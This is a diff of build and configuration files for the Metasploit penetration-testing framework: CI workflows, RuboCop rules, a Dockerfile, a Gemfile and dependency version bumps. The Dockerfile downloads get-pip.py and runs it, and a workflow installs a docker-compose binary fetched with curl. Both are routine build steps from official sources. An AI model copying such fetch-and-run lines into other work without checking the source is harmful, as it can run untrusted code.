const config = allConfig[issueType][context.payload.label.name];
if (!config) {
return;
}
if (config.comment) {
const precedingWhitespaceLength = config.comment.split("\n")[1].search(/\S/);
const commentWithoutPreceedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
await github.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: commentWithoutPreceedingWhitespace
});
}
if (config.close) {
await github.issues.update({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
state: 'closed'
});
}
+61
View File
@@ -0,0 +1,61 @@
name: Lint
on:
push:
branches-ignore:
- gh-pages
- metakitty
pull_request:
branches:
- '*'
jobs:
msftidy:
runs-on: ubuntu-16.04
timeout-minutes: 40
strategy:
fail-fast: true
matrix:
ruby:
- 2.5
name: Lint msftidy
steps:
- name: Install system dependencies
run: sudo apt-get install libpcap-dev graphviz
- name: Checkout code
uses: actions/checkout@v2
# Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
# https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
with:
fetch-depth: 0
- uses: actions/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
- name: Setup bundler
run: |
gem install bundler
- uses: actions/cache@v2
with:
path: vendor/bundle
key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
restore-keys: |
${{ runner.os }}-gems-
- name: Bundle install
run: |
bundle config path vendor/bundle
bundle install --jobs 4 --retry 3
env:
BUNDLER_WITHOUT: coverage development pcap
- name: Run msftidy
run: |
ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
ls -la ./.git/hooks
./.git/hooks/post-merge
+4 -4
View File
@@ -1,6 +1,6 @@
on:
schedule:
- cron: "0 16 * * *"
- cron: "0 15 * * 1-5"
name: Stale Bot workflow
jobs:
build:
@@ -14,7 +14,7 @@ jobs:
repo-token: ${{ secrets.GITHUB_TOKEN }}
days-before-stale: 30
days-before-close: 30
operations-per-run: 10
operations-per-run: 75
stale-issue-message: |
Hi!
@@ -32,5 +32,5 @@ jobs:
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
exempt-issue-labels: |
not stale
debug-only: true
not-stale,confirmed,easy,newbie-friendly,suggestion,suggestion-module,suggestion-feature,suggestion-docs,ascii-utf8-issues,database,feature,enhancement,library
debug-only: false
+107
View File
@@ -0,0 +1,107 @@
name: Verify
on:
push:
branches-ignore:
- gh-pages
- metakitty
pull_request:
branches:
- '*'
jobs:
build:
runs-on: ubuntu-16.04
timeout-minutes: 40
name: Docker Build
steps:
- name: Checkout code
uses: actions/checkout@v2
- name: docker-compose build
run: |
curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
chmod +x docker-compose
sudo mv docker-compose /usr/bin
/usr/bin/docker-compose build
test:
runs-on: ubuntu-16.04
timeout-minutes: 40
services:
postgres:
image: postgres:9.6
ports: ["5432:5432"]
env:
POSTGRES_USER: postgres
POSTGRES_PASSWORD: postgres
options: >-
--health-cmd pg_isready
--health-interval 10s
--health-timeout 5s
--health-retries 5
strategy:
fail-fast: true
matrix:
ruby:
- 2.5
- 2.6
- 2.7
test_cmd:
- bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
- bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
# Used for testing the remote data service
- bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1
- bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1
env:
RAILS_ENV: test
name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
steps:
- name: Install system dependencies
run: sudo apt-get install libpcap-dev graphviz
- name: Checkout code
uses: actions/checkout@v2
- uses: actions/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
- name: Setup bundler
run: |
gem install bundler
- uses: actions/cache@v2
with:
path: vendor/bundle
key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
restore-keys: |
${{ runner.os }}-gems-
- name: Bundle install
run: |
bundle config path vendor/bundle
bundle install --jobs 4 --retry 3
env:
BUNDLER_WITHOUT: coverage development pcap
- name: Create database
run: |
cp config/database.yml.github_actions config/database.yml
bundle exec rake --version
bundle exec rake db:create
bundle exec rake db:migrate
# fail build if db/schema.rb update is not committed
git diff --exit-code db/schema.rb
- name: ${{ matrix.test_cmd }}
run: |
echo "${CMD}"
bash -c "${CMD}"
env:
CMD: ${{ matrix.test_cmd }}
+2
View File
@@ -9,6 +9,7 @@ bturner-r7 <bturner-r7@github> <brandon_turner@rapid7.com>
bwatters-r7 <bwatters-r7@github> <bwatters@rapid7.com>
cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
cdoughty-r7 <cdoughty-r7@github> <chris_doughty@rapid7.com>
cgranleese-r7 <cgranleese-r7@github> <christopher_granleese@rapid7.com>
dheiland-r7 <dheiland-r7@github> <dh@layereddefense.com>
dwelch-r7 <dwelch-r7@github> <dean_welch@rapid7.com>
ecarey-r7 <ecarey-r7@github> <e@ipwnstuff.com>
@@ -154,6 +155,7 @@ sdavis-r7 <sdavis-r7@github> <scott_davis@rapid7.com>
sdavis-r7 <sdavis-r7@github> <Scott_Davis@rapid7.com>
sdavis-r7 <sdavis-r7@github> <sdavis@rapid7.com>
skape <skape@???> Matt Miller <mmiller@hick.org>
smashery <smashery@github> Ashley Donaldson <smashery@gmail.com>
spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
stufus <stufus@github> Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
stufus <stufus@github> Stuart <stufus@users.noreply.github.com>
+202 -10
View File
@@ -4,16 +4,145 @@
# new modules.
#
# Updates to this file should include a 'Description' parameter for any
# explaination needed.
# explanation needed.
# inherit_from: .rubocop_todo.yml
AllCops:
TargetRubyVersion: 2.4
TargetRubyVersion: 2.5
SuggestExtensions: false
NewCops: disable
require:
- ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
- ./lib/rubocop/cop/layout/module_description_indentation.rb
- ./lib/rubocop/cop/layout/extra_spacing_with_bindata_ignored.rb
- ./lib/rubocop/cop/lint/module_disclosure_date_format.rb
- ./lib/rubocop/cop/lint/module_disclosure_date_present.rb
- ./lib/rubocop/cop/lint/deprecated_gem_version.rb
Layout/SpaceBeforeBrackets:
Description: >-
Disabled as it generates invalid code:
https://github.com/rubocop-hq/rubocop/issues/9499
Enabled: false
Lint/AmbiguousAssignment:
Enabled: true
Lint/DeprecatedConstants:
Enabled: true
Lint/DuplicateBranch:
Description: >-
Disabled as it causes a lot of noise around our current exception/error handling
Enabled: false
Lint/DuplicateRegexpCharacterClassElement:
Enabled: false
Lint/EmptyBlock:
Enabled: false
Lint/EmptyClass:
Enabled: false
Lint/LambdaWithoutLiteralBlock:
Enabled: true
Lint/NoReturnInBeginEndBlocks:
Enabled: true
Lint/NumberedParameterAssignment:
Enabled: true
Lint/OrAssignmentToConstant:
Enabled: true
Lint/RedundantDirGlobSort:
Enabled: true
Lint/SymbolConversion:
Enabled: true
Lint/ToEnumArguments:
Enabled: true
Lint/TripleQuotes:
Enabled: true
Lint/UnexpectedBlockArity:
Enabled: true
Lint/UnmodifiedReduceAccumulator:
Enabled: true
Style/ArgumentsForwarding:
Enabled: true
Style/BlockComments:
Description: >-
Disabled as multiline comments are great for embedded code snippets/payloads that can
be copy/pasted directly into a terminal etc.
Enabled: false
Style/CaseLikeIf:
Description: >-
This would cause a lot of noise, and potentially introduce subtly different code when
being auto fixed. Could potentially be enabled in isolation, but would require more
consideration.
Enabled: false
Style/CollectionCompact:
Enabled: true
Style/DocumentDynamicEvalDefinition:
Enabled: false
Style/EndlessMethod:
Enabled: true
Style/HashExcept:
Enabled: true
Style/IfWithBooleanLiteralBranches:
Description: >-
Most of the time this is a valid replacement. Although it can generate subtly different
rewrites that might break code:
2.7.2 :001 > foo = nil
=> nil
2.7.2 :002 > (foo && foo['key'] == 'foo') ? true : false
=> false
2.7.2 :003 > foo && foo['key'] == 'foo'
=> nil
Enabled: false
Style/NegatedIfElseCondition:
Enabled: false
Style/MultipleComparison:
Description: >-
Disabled as it generates invalid code:
https://github.com/rubocop-hq/rubocop/issues/9520
It may also introduce subtle semantic issues if automatically applied to the
entire codebase without rigorous testing.
Enabled: false
Style/NilLambda:
Enabled: true
Style/RedundantArgument:
Enabled: false
Style/RedundantAssignment:
Description: >-
Disabled as it sometimes improves the readability of code having an explicitly named
response object, it also makes it easier to put a breakpoint between the assignment
and return expression
Enabled: false
Style/SwapValues:
Enabled: false
Layout/ModuleHashOnNewLine:
Enabled: true
@@ -21,6 +150,19 @@ Layout/ModuleHashOnNewLine:
Layout/ModuleDescriptionIndentation:
Enabled: true
Lint/ModuleDisclosureDateFormat:
Enabled: true
Lint/ModuleDisclosureDatePresent:
Include:
# Only exploits require disclosure dates, but they can be present in auxiliary modules etc.
- 'modules/exploits/**/*'
Lint/DeprecatedGemVersion:
Enabled: true
Exclude:
- 'metasploit-framework.gemspec'
Metrics/ClassLength:
Description: 'Most Metasploit modules are quite large. This is ok.'
Enabled: true
@@ -43,6 +185,17 @@ Metrics/PerceivedComplexity:
Enabled: false
Description: 'This is often a red-herring'
Metrics/BlockNesting:
Description: >-
This is a good rule to follow, but will cause a lot of overhead introducing this rule.
Enabled: false
Metrics/ParameterLists:
Description: >-
This is a good rule to follow, but will cause a lot of overhead introducing this rule.
Increasing the max count for now
Max: 8
Style/TernaryParentheses:
Enabled: false
Description: 'This outright produces bugs'
@@ -55,6 +208,30 @@ Style/RedundantReturn:
Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
Enabled: false
Naming/HeredocDelimiterNaming:
Description: >-
Could be enabled in isolation with additional effort.
Enabled: false
Naming/AccessorMethodName:
Description: >-
Disabled for now, as this naming convention is used in a lot of core library files.
Could be enabled in isolation with additional effort.
Enabled: false
Naming/ConstantName:
Description: >-
Disabled for now, Metasploit is unfortunately too inconsistent with its naming to introduce
this. Definitely possible to enforce this in the future if need be.
Examples:
ManualRanking, LowRanking, etc.
NERR_ClientNameNotFound
HttpFingerprint
CachedSize
ErrUnknownTransferId
Enabled: false
Naming/VariableNumber:
Description: 'To make it easier to use reference code, disable this cop'
Enabled: false
@@ -68,6 +245,7 @@ Style/Documentation:
Description: 'Most Metasploit modules do not have class documentation.'
Exclude:
- 'modules/**/*'
- 'spec/file_fixtures/modules/**/*'
Layout/FirstArgumentIndentation:
Enabled: true
@@ -116,16 +294,28 @@ Style/ParenthesesAroundCondition:
Enabled: false
Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
Style/StringConcatenation:
Enabled: false
Description: >-
Disabled for now as it changes escape sequences when auto corrected:
https://github.com/rubocop/rubocop/issues/9543
Additionally seems to break with multiline string concatenation with trailing comments, example:
payload = "\x12" + # Size
"\x34" + # eip
"\x56" # etc
With `rubocop -A` this will become:
payload = "\u00124V" # etc
Style/TrailingCommaInArrayLiteral:
Enabled: false
Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'
Metrics/LineLength:
Layout/LineLength:
Description: >-
Metasploit modules often pattern match against very
long strings when identifying targets.
Enabled: true
Max: 180
Enabled: false
Metrics/BlockLength:
Enabled: true
@@ -172,7 +362,7 @@ Layout/EmptyLinesAroundMethodBody:
Enabled: false
Description: 'these are used to increase readability'
Layout/ExtraSpacing:
Layout/ExtraSpacingWithBinDataIgnored:
Description: 'Do not use unnecessary spacing.'
Enabled: true
# When true, allows most uses of extra spacing if the intent is to align
@@ -182,7 +372,7 @@ Layout/ExtraSpacing:
# When true, allows things like 'obj.meth(arg) # comment',
# rather than insisting on 'obj.meth(arg) # comment'.
# If done for alignment, either this OR AllowForAlignment will allow it.
AllowBeforeTrailingComments: false
AllowBeforeTrailingComments: true
# When true, forces the alignment of `=` in assignments on consecutive lines.
ForceEqualSignAlignment: false
@@ -238,6 +428,8 @@ Style/SafeNavigation:
configuration.
Enabled: false
Documentation:
Exclude:
- 'modules/**/*'
Style/UnpackFirst:
Description: >-
Disabling to make it easier to copy/paste `unpack('h*')` expressions from code
into a debugging REPL.
Enabled: false
+1 -1
View File
@@ -1 +1 @@
2.6.6
2.7.2
-75
View File
@@ -1,75 +0,0 @@
dist: trusty
sudo: false
group: stable
bundler_args: --without coverage development pcap
cache: bundler
addons:
postgresql: '9.6'
apt:
packages:
- libpcap-dev
- graphviz
language: ruby
rvm:
- '2.5.8'
- '2.6.6'
env:
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
# Used for testing the remote data service
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'
matrix:
fast_finish: true
jobs:
# build docker image
include:
- env: CMD="/usr/bin/docker-compose build" DOCKER="true"
# we do not need any setup
before_install: skip
install: skip
before_script:
- curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
- chmod +x docker-compose
- sudo mv docker-compose /usr/bin
before_install:
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
- rake --version
# Fail build if msftidy is not successful
- ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
- ls -la ./.git/hooks
- ./.git/hooks/post-merge
# Update the bundler
- gem update --system 3.0.6
- gem install bundler
before_script:
- cp config/database.yml.travis config/database.yml
- bundle exec rake --version
- bundle exec rake db:create
- bundle exec rake db:migrate
# fail build if db/schema.rb update is not committed
- git diff --exit-code db/schema.rb
script:
- echo "${CMD}"
# we need travis_wait because the Docker build job can take longer than 10 minutes
#- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
# docker_wait is currently broken on travis-ci, so let's just run CMD directly for now
- bash -c "${CMD}"
notifications:
irc: "irc.freenode.org#msfnotify"
git:
depth: 5
# Blacklist certain branches from triggering travis builds
branches:
except:
- gh-pages
- metakitty
services:
- docker
+7 -7
View File
@@ -5,17 +5,17 @@ world -- a better place! Before you get started, please review our [Code of Con
## Code Free Contributions
Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
- You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea:
- You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new/choose) with detailed information about your issue or idea:
- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
- [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
- [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
- [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
- Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
## Code Contributions
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.
For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/Get-Started-Writing-an-Exploit). It will help you to get started and avoid some common mistakes.
Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
@@ -92,17 +92,17 @@ curve, so keep it up!
[50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
[topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
[console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
[verification steps]:https://help.github.com/articles/writing-on-github#task-lists
[console output]:https://docs.github.com/en/free-pro-team@latest/github/writing-on-github/creating-and-highlighting-code-blocks#fenced-code-blocks
[verification steps]:https://docs.github.com/en/free-pro-team@latest/github/writing-on-github/basic-writing-and-formatting-syntax#task-lists
[reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
[pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
[API]:https://rapid7.github.io/metasploit-framework/api
[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
[module documentation]:https://github.com/rapid7/metasploit-framework/wiki/Module-Documentation
[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
[RSpec]:http://rspec.info
[Better Specs]:http://www.betterspecs.org/
[YARD]:http://yardoc.org
[Issues]:https://github.com/rapid7/metasploit-framework/issues
[Metasploit Slack]:https://www.metasploit.com/slack
[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+10 -6
View File
@@ -1,7 +1,7 @@
FROM ruby:2.6.6-alpine3.10 AS builder
FROM ruby:2.7.2-alpine3.12 AS builder
LABEL maintainer="Rapid7"
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
ENV APP_HOME=/usr/src/metasploit-framework
ENV BUNDLE_IGNORE_MESSAGES="true"
WORKDIR $APP_HOME
@@ -28,15 +28,16 @@ RUN apk add --no-cache \
ncurses-dev \
git \
&& echo "gem: --no-document" > /etc/gemrc \
&& gem update --system 3.0.6 \
&& bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
&& gem update --system \
&& bundle config $BUNDLER_ARGS \
&& bundle install --jobs=8 \
# temp fix for https://github.com/bundler/bundler/issues/6680
&& rm -rf /usr/local/bundle/cache \
# needed so non root users can read content of the bundle
&& chmod -R a+r /usr/local/bundle
FROM ruby:2.6.5-alpine3.10
FROM ruby:2.7.2-alpine3.12
LABEL maintainer="Rapid7"
ENV APP_HOME=/usr/src/metasploit-framework
@@ -46,7 +47,7 @@ ENV METASPLOIT_GROUP=metasploit
# used for the copy command
RUN addgroup -S $METASPLOIT_GROUP
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python2 python3 ncurses libcap su-exec alpine-sdk python2-dev openssl-dev nasm
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -56,7 +57,10 @@ RUN chown -R root:metasploit /usr/local/bundle
COPY . $APP_HOME/
RUN chown -R root:metasploit $APP_HOME/
RUN chmod 664 $APP_HOME/Gemfile.lock
RUN gem update --system
RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
RUN curl -L -O https://github.com/pypa/get-pip/raw/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/get-pip.py && python get-pip.py && rm get-pip.py
RUN pip install impacket
WORKDIR $APP_HOME
+1 -3
View File
@@ -3,8 +3,6 @@ source 'https://rubygems.org'
# spec.add_runtime_dependency '<name>', [<version requirements>]
gemspec name: 'metasploit-framework'
gem 'sqlite3', '~>1.3.0'
# separate from test as simplecov is not run on travis-ci
group :coverage do
# code coverage for tests
@@ -23,7 +21,7 @@ group :development do
# memory profiling
gem 'memory_profiler'
# cpu profiling
gem 'ruby-prof'
gem 'ruby-prof', '1.4.2'
# Metasploit::Aggregator external session proxy
# disabled during 2.5 transition until aggregator is available
#gem 'metasploit-aggregator'
+4 -1
View File
@@ -27,6 +27,9 @@ end
# Create a custom group
group :local do
# Add the lab gem so that the 'lab' plugin will work again
# This is the first way to add a non-standard gem file dependency in.
gem 'lab', '~> 0.2.7'
# And this is another way that references local directories to find and compile the gem file as needed.
# This is the optimal method for testing Gem PRs such as those in rex-text or rex-powershell.
gem 'rex-powershell', path: '../rex-powershell'
end
+166 -154
View File
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (6.0.2)
metasploit-framework (6.0.41)
actionpack (~> 5.2.2)
activerecord (~> 5.2.2)
activesupport (~> 5.2.2)
@@ -10,7 +10,6 @@ PATH
aws-sdk-s3
bcrypt
bcrypt_pbkdf
bit-struct
bson
concurrent-ruby (= 1.0.5)
dnsruby
@@ -26,12 +25,12 @@ PATH
jsobfu
json
metasm
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 2.0.10)
metasploit_data_models
metasploit_payloads-mettle (= 1.0.2)
metasploit-concern (~> 3.0.0)
metasploit-credential (~> 4.0.0)
metasploit-model (~> 3.1.0)
metasploit-payloads (= 2.0.43)
metasploit_data_models (~> 4.1.0)
metasploit_payloads-mettle (= 1.0.9)
mqtt
msgpack
nessus_rest
@@ -48,6 +47,7 @@ PATH
pcaprub
pdf-reader
pg
puma
railties
rb-readline
recog
@@ -84,31 +84,32 @@ PATH
windows_error
xdr
xmlrpc
zeitwerk
GEM
remote: https://rubygems.org/
specs:
Ascii85 (1.0.3)
actionpack (5.2.4.3)
actionview (= 5.2.4.3)
activesupport (= 5.2.4.3)
Ascii85 (1.1.0)
actionpack (5.2.5)
actionview (= 5.2.5)
activesupport (= 5.2.5)
rack (~> 2.0, >= 2.0.8)
rack-test (>= 0.6.3)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (5.2.4.3)
activesupport (= 5.2.4.3)
actionview (5.2.5)
activesupport (= 5.2.5)
builder (~> 3.1)
erubi (~> 1.4)
rails-dom-testing (~> 2.0)
rails-html-sanitizer (~> 1.0, >= 1.0.3)
activemodel (5.2.4.3)
activesupport (= 5.2.4.3)
activerecord (5.2.4.3)
activemodel (= 5.2.4.3)
activesupport (= 5.2.4.3)
activemodel (5.2.5)
activesupport (= 5.2.5)
activerecord (5.2.5)
activemodel (= 5.2.5)
activesupport (= 5.2.5)
arel (>= 9.0)
activesupport (5.2.4.3)
activesupport (5.2.5)
concurrent-ruby (~> 1.0, >= 1.0.2)
i18n (>= 0.7, < 2)
minitest (~> 5.1)
@@ -117,36 +118,35 @@ GEM
public_suffix (>= 2.0.2, < 5.0)
afm (0.2.2)
arel (9.0.0)
arel-helpers (2.11.0)
arel-helpers (2.12.0)
activerecord (>= 3.1.0, < 7)
ast (2.4.1)
aws-eventstream (1.1.0)
aws-partitions (1.354.0)
aws-sdk-core (3.104.3)
ast (2.4.2)
aws-eventstream (1.1.1)
aws-partitions (1.445.0)
aws-sdk-core (3.114.0)
aws-eventstream (~> 1, >= 1.0.2)
aws-partitions (~> 1, >= 1.239.0)
aws-sigv4 (~> 1.1)
jmespath (~> 1.0)
aws-sdk-ec2 (1.186.0)
aws-sdk-core (~> 3, >= 3.99.0)
aws-sdk-ec2 (1.234.0)
aws-sdk-core (~> 3, >= 3.112.0)
aws-sigv4 (~> 1.1)
aws-sdk-iam (1.43.0)
aws-sdk-core (~> 3, >= 3.99.0)
aws-sdk-iam (1.52.0)
aws-sdk-core (~> 3, >= 3.112.0)
aws-sigv4 (~> 1.1)
aws-sdk-kms (1.36.0)
aws-sdk-core (~> 3, >= 3.99.0)
aws-sdk-kms (1.43.0)
aws-sdk-core (~> 3, >= 3.112.0)
aws-sigv4 (~> 1.1)
aws-sdk-s3 (1.78.0)
aws-sdk-core (~> 3, >= 3.104.3)
aws-sdk-s3 (1.93.1)
aws-sdk-core (~> 3, >= 3.112.0)
aws-sdk-kms (~> 1)
aws-sigv4 (~> 1.1)
aws-sigv4 (1.2.1)
aws-sigv4 (1.2.3)
aws-eventstream (~> 1, >= 1.0.2)
bcrypt (3.1.15)
bcrypt_pbkdf (1.0.1)
bcrypt (3.1.16)
bcrypt_pbkdf (1.1.0)
bindata (2.4.8)
bit-struct (0.16)
bson (4.10.0)
bson (4.12.0)
builder (3.2.4)
byebug (11.1.3)
coderay (1.1.3)
@@ -155,11 +155,11 @@ GEM
crass (1.0.6)
daemons (1.3.1)
diff-lcs (1.4.4)
dnsruby (1.61.4)
dnsruby (1.61.5)
simpleidn (~> 0.1)
docile (1.3.2)
docile (1.3.5)
ed25519 (1.2.4)
em-http-request (1.1.6)
em-http-request (1.1.7)
addressable (>= 2.3.4)
cookiejar (!= 0.3.1)
em-socksify (>= 0.3)
@@ -167,17 +167,20 @@ GEM
http_parser.rb (>= 0.6.0)
em-socksify (0.3.2)
eventmachine (>= 1.0.0.beta.4)
erubi (1.9.0)
erubi (1.10.0)
eventmachine (1.2.7)
factory_bot (6.1.0)
activesupport (>= 5.0.0)
factory_bot_rails (6.1.0)
factory_bot (~> 6.1.0)
railties (>= 5.0.0)
faker (2.13.0)
faker (2.17.0)
i18n (>= 1.6, < 2)
faraday (1.0.1)
faraday (1.3.0)
faraday-net_http (~> 1.0)
multipart-post (>= 1.2, < 3)
ruby2_keywords
faraday-net_http (1.0.1)
faye-websocket (0.11.0)
eventmachine (>= 0.12.0)
websocket-driver (>= 0.5.1)
@@ -187,25 +190,25 @@ GEM
hrr_rb_ssh (0.3.0.pre2)
ed25519 (~> 1.2)
http_parser.rb (0.6.0)
i18n (1.8.5)
i18n (1.8.10)
concurrent-ruby (~> 1.0)
io-console (0.5.6)
irb (1.2.4)
reline (>= 0.0.1)
io-console (0.5.9)
irb (1.3.5)
reline (>= 0.1.5)
jmespath (1.4.0)
jsobfu (0.4.2)
rkelly-remix
json (2.3.1)
loofah (2.6.0)
json (2.5.1)
loofah (2.9.1)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
memory_profiler (0.9.14)
memory_profiler (1.0.0)
metasm (1.0.4)
metasploit-concern (3.0.0)
metasploit-concern (3.0.1)
activemodel (~> 5.2.2)
activesupport (~> 5.2.2)
railties (~> 5.2.2)
metasploit-credential (4.0.2)
metasploit-credential (4.0.3)
metasploit-concern
metasploit-model
metasploit_data_models (>= 3.0.0)
@@ -215,37 +218,40 @@ GEM
rex-socket
rubyntlm
rubyzip
metasploit-model (3.0.0)
metasploit-model (3.1.3)
activemodel (~> 5.2.2)
activesupport (~> 5.2.2)
railties (~> 5.2.2)
metasploit-payloads (2.0.10)
metasploit_data_models (4.0.2)
metasploit-payloads (2.0.43)
metasploit_data_models (4.1.3)
activerecord (~> 5.2.2)
activesupport (~> 5.2.2)
arel-helpers
metasploit-concern
metasploit-model
metasploit-model (>= 3.1)
pg
railties (~> 5.2.2)
recog (~> 2.0)
metasploit_payloads-mettle (1.0.2)
webrick
metasploit_payloads-mettle (1.0.9)
method_source (1.0.0)
mini_portile2 (2.4.0)
minitest (5.14.1)
mini_portile2 (2.5.0)
minitest (5.14.4)
mqtt (0.5.0)
msgpack (1.3.3)
msgpack (1.4.2)
multipart-post (2.1.1)
mustermann (1.1.1)
ruby2_keywords (~> 0.0.1)
nessus_rest (0.1.6)
net-ldap (0.16.2)
net-ldap (0.17.0)
net-ssh (6.1.0)
network_interface (0.0.2)
nexpose (7.2.1)
nokogiri (1.10.10)
mini_portile2 (~> 2.4.0)
octokit (4.18.0)
nexpose (7.3.0)
nio4r (2.5.7)
nokogiri (1.11.3)
mini_portile2 (~> 2.5.0)
racc (~> 1.4)
octokit (4.20.0)
faraday (>= 0.9)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.2)
@@ -253,13 +259,13 @@ GEM
openvas-omp (0.0.4)
packetfu (1.1.13)
pcaprub
parallel (1.19.2)
parser (2.7.1.4)
parallel (1.20.1)
parser (3.0.1.0)
ast (~> 2.4.1)
patch_finder (1.0.2)
pcaprub (0.13.0)
pdf-reader (2.4.0)
Ascii85 (~> 1.0.0)
pdf-reader (2.4.2)
Ascii85 (~> 1.0)
afm (~> 0.2.1)
